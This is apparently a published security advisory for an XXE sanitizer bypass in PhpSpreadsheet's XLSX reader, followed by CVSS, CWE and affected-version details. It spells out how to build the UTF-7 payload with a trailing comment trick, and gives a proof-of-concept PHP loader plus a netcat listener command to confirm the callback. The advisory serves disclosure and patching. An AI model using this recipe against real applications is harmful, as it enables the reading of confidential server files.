XXE in PHPSpreadsheet's XLSX reader

Description

Summary

The XmlScanner class has a scan method which should prevent XXE attacks.

However, we found a bypass that is different from the previously reported CVE-2024-47873. The findCharSet method, which determines the encoding of the document, relies on two regexes. An attacker can encode the payload in UTF-7, declare encoding='UTF-7' with single quotes (') in the XML header, and append a comment containing encoding="UTF-8" with double quotes (") to the end of the file. The first regex matches the double-quoted value in the comment, so the second regex never gets to match the single-quoted encoding='UTF-7' in the header:

$patterns = [
    '/encoding\\s*=\\s*"([^"]*]?)"/',
    "/encoding\\s*=\\s*'([^']*?)'/",
];
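
To make the ordering problem concrete, here is a minimal sketch of a first-match-wins charset lookup built on the two patterns above. The function name findCharSetSketch, the loop, and the UTF-8 fallback are assumptions for illustration, not a copy of the library's method. The XML strings are shortened placeholders that contain no entity payload.

```php
<?php
// Hypothetical stand-in for the scanner's charset detection: try each
// pattern in order and return the first captured value.
function findCharSetSketch(string $xml): string
{
    $patterns = [
        '/encoding\\s*=\\s*"([^"]*]?)"/',
        "/encoding\\s*=\\s*'([^']*?)'/",
    ];
    foreach ($patterns as $pattern) {
        if (preg_match($pattern, $xml, $matches) === 1) {
            return strtoupper($matches[1]);
        }
    }

    return 'UTF-8'; // assumed default when no encoding is declared
}

// Header alone: only the single-quote pattern can match.
$headerOnly = "<?xml version = \"1.0\" encoding='UTF-7'?>\n<workbook/>";

// Same header plus the trailing UTF-7-encoded comment from the advisory.
$withComment = $headerOnly . "\n" . '+ADw-+ACE---encoding="UTF-8"--+AD4-';

echo findCharSetSketch($headerOnly), "\n";  // UTF-7
echo findCharSetSketch($withComment), "\n"; // UTF-8
```

Under these assumptions, the double-quoted value anywhere in the file takes priority over the single-quoted value in the header, regardless of where each one appears.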

A payload for the workbook.xml file can, for example, be created with CyberChef.
If PhpSpreadsheet opens an Excel file whose workbook.xml contains the payload from the link above, it sends an HTTP request to 127.0.0.1:12345. To confirm that the request is made, run the nc -nlvp 12345 command before opening the file with PhpSpreadsheet.

To create the payload:
1. Create an XML file that begins with <?xml version = "1.0" encoding='UTF-7' (note the single quotes around the encoding value).
2. Use the CyberChef link mentioned above to create your XXE payload and add it to the XML file.
3. Add +ADw-+ACE---encoding="UTF-8"--+AD4- to the end of the XML file. This string is matched by the first regex.
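
The string in step 3 is an XML comment written in UTF-7. The sketch below decodes it by hand to show what an XML parser that honours the UTF-7 header would see. The helper decodeAsciiUtf7 is hypothetical and deliberately simplified: it only handles shifted runs that end with an explicit "-" and whose characters are plain ASCII.

```php
<?php
// Decode UTF-7 shifted runs (+...-) whose code units are plain ASCII.
// Simplified on purpose: anything outside ASCII is replaced with '?',
// and a run must be closed by an explicit '-'.
function decodeAsciiUtf7(string $input): string
{
    return (string) preg_replace_callback(
        '/\+([A-Za-z0-9+\/]*)-/',
        function (array $m): string {
            if ($m[1] === '') {
                return '+'; // "+-" is the escape for a literal plus sign
            }
            // Modified base64 omits padding; restore it before decoding.
            $padded = $m[1] . str_repeat('=', (4 - strlen($m[1]) % 4) % 4);
            $utf16 = (string) base64_decode($padded);
            $out = '';
            // Walk the UTF-16BE code units two bytes at a time.
            for ($i = 0; $i + 1 < strlen($utf16); $i += 2) {
                $isAscii = $utf16[$i] === "\0" && ord($utf16[$i + 1]) < 0x80;
                $out .= $isAscii ? $utf16[$i + 1] : '?';
            }

            return $out;
        },
        $input
    );
}

$trailer = '+ADw-+ACE---encoding="UTF-8"--+AD4-';
echo decodeAsciiUtf7($trailer), "\n"; // <!--encoding="UTF-8"-->
```

The raw bytes still contain the literal text encoding="UTF-8", which is why the first regex matches it even though the parser later treats the whole string as a harmless comment.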

PoC

payload.xlsx

  • Create a new folder.
  • Run the composer require phpoffice/phpspreadsheet command in the new folder.
  • Create an index.php file in that folder with the following content:
<?php
require 'vendor/autoload.php';

use PhpOffice\PhpSpreadsheet\IOFactory;

$inputFileType = 'Xlsx';
$inputFileName = './payload.xlsx';

// Create a new Reader of the type defined in $inputFileType
$reader = IOFactory::createReader($inputFileType);
// Advise the Reader that we only want to load cell data
$reader->setReadDataOnly(true);

$worksheetData = $reader->listWorksheetInfo($inputFileName);

foreach ($worksheetData as $worksheetInfo) {
    $sheetName = $worksheetInfo['worksheetName'];

    echo "<h4>$sheetName</h4>";
    // Load only this sheet from $inputFileName into a Spreadsheet object
    $reader->setLoadSheetsOnly($sheetName);
    $spreadsheet = $reader->load($inputFileName);

    $worksheet = $spreadsheet->getActiveSheet();
    print_r($worksheet->toArray());
}
  • Run the following command: php -S 127.0.0.1:8080
  • Add the payload.xlsx file to the folder and open <http://127.0.0.1:8080> in a browser (the built-in PHP server speaks plain HTTP, not HTTPS). The netcat listener will show an HTTP request for <http://127.0.0.1:12345/ext.dtd>.

Impact

An attacker can bypass the sanitizer and achieve an XXE attack.

Basic information

Type
reviewed
Severity
high
Published (advisory)
2024-11-18 20:01:46 UTC
Updated
2025-03-06 18:22:22 UTC
GitHub reviewed
2024-11-18 20:01:46 UTC
NVD published
2024-11-18

EPSS Score

Score    Percentile
0.17%    38.70%

CVSS Scores

Base score    Version    Severity    Vector
7.5           3.1        High        CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network—not just someone sitting at the machine.
Attack complexity (AC:L)
Once they can reach the bug, pulling it off is straightforward—no weird race conditions or rare setup.
Privileges required (PR:N)
No account or special rights needed—anonymous or random user is enough.
User interaction (UI:N)
Nobody has to click “OK” or open a trap file; it can work without a victim helping.
Scope (S:U)
Damage stays in the same “trust bubble” as the broken component—no big spill into unrelated systems.
Confidentiality (C:H)
Serious risk that confidential data gets exposed in a big way.
Integrity (I:N)
Data isn’t meaningfully altered or forged.
Availability (A:N)
Service keeps running; no real outage angle.
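
For readers who want to see how the vector turns into 7.5, the sketch below applies the CVSS v3.1 base-score equations for the scope-unchanged case. The function names are hypothetical and scope-changed vectors are deliberately not handled. The metric weights and the round-up rule are taken from the CVSS v3.1 specification.

```php
<?php
// CVSS v3.1 "Roundup": smallest one-decimal number >= the input,
// computed on integers to avoid floating-point artifacts.
function roundUp(float $value): float
{
    $scaled = (int) round($value * 100000);
    if ($scaled % 10000 === 0) {
        return $scaled / 100000.0;
    }

    return (intdiv($scaled, 10000) + 1) / 10.0;
}

// Base score for vectors with S:U only (PR weights are the S:U ones).
function baseScoreScopeUnchanged(string $vector): float
{
    $cia = ['H' => 0.56, 'L' => 0.22, 'N' => 0.0];
    $weights = [
        'AV' => ['N' => 0.85, 'A' => 0.62, 'L' => 0.55, 'P' => 0.2],
        'AC' => ['L' => 0.77, 'H' => 0.44],
        'PR' => ['N' => 0.85, 'L' => 0.62, 'H' => 0.27],
        'UI' => ['N' => 0.85, 'R' => 0.62],
        'C' => $cia,
        'I' => $cia,
        'A' => $cia,
    ];

    $m = [];
    foreach (explode('/', $vector) as $part) {
        [$key, $value] = explode(':', $part);
        if (isset($weights[$key][$value])) {
            $m[$key] = $weights[$key][$value]; // skips "CVSS:3.1" and "S:U"
        }
    }

    $iss = 1 - (1 - $m['C']) * (1 - $m['I']) * (1 - $m['A']);
    $impact = 6.42 * $iss;
    $exploitability = 8.22 * $m['AV'] * $m['AC'] * $m['PR'] * $m['UI'];

    if ($impact <= 0) {
        return 0.0;
    }

    return roundUp(min($impact + $exploitability, 10.0));
}

echo baseScoreScopeUnchanged('CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'), "\n"; // 7.5
```

Here the impact sub-score is 6.42 × 0.56 ≈ 3.60 and the exploitability sub-score is about 3.89, so the sum of roughly 7.48 rounds up to 7.5.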

Identifiers

CWEs

CWE id Name
CWE-611 Improper Restriction of XML External Entity Reference

Credits

  • antoniospataro (reporter)
  • Antonio-R1 (reporter)

Affected packages (5)

Vulnerable version ranges and first patched releases as published by GitHub.

Ecosystem    Package                     Vulnerable range      First patched    Vulnerable functions
composer     phpoffice/phpspreadsheet    < 1.29.4              1.29.4           -
composer     phpoffice/phpspreadsheet    >= 2.0.0, < 2.1.3     2.1.3            -
composer     phpoffice/phpspreadsheet    >= 2.2.0, < 2.3.2     2.3.2            -
composer     phpoffice/phpspreadsheet    >= 3.3.0, < 3.4.0     3.4.0            -
composer     phpoffice/phpexcel          <= 1.8.2              -                -
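
As a quick way to check a given phpoffice/phpspreadsheet version against the ranges above, the following sketch uses PHP's built-in version_compare. The function name isInVulnerableRange is hypothetical, and the ranges are copied literally from the table. The phpoffice/phpexcel row is not covered because no patched release is listed for it.

```php
<?php
// Each entry: [inclusive lower bound or null, first patched release].
// Values are taken from the affected-packages table for
// phpoffice/phpspreadsheet only.
function isInVulnerableRange(string $version): bool
{
    $ranges = [
        [null, '1.29.4'],
        ['2.0.0', '2.1.3'],
        ['2.2.0', '2.3.2'],
        ['3.3.0', '3.4.0'],
    ];

    foreach ($ranges as [$min, $patched]) {
        $aboveMin = $min === null || version_compare($version, $min, '>=');
        if ($aboveMin && version_compare($version, $patched, '<')) {
            return true;
        }
    }

    return false;
}

var_dump(isInVulnerableRange('2.3.1')); // bool(true)
var_dump(isInVulnerableRange('2.3.2')); // bool(false)
```

The version string would come from wherever the installed version is tracked in your project, for example the composer.lock file.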
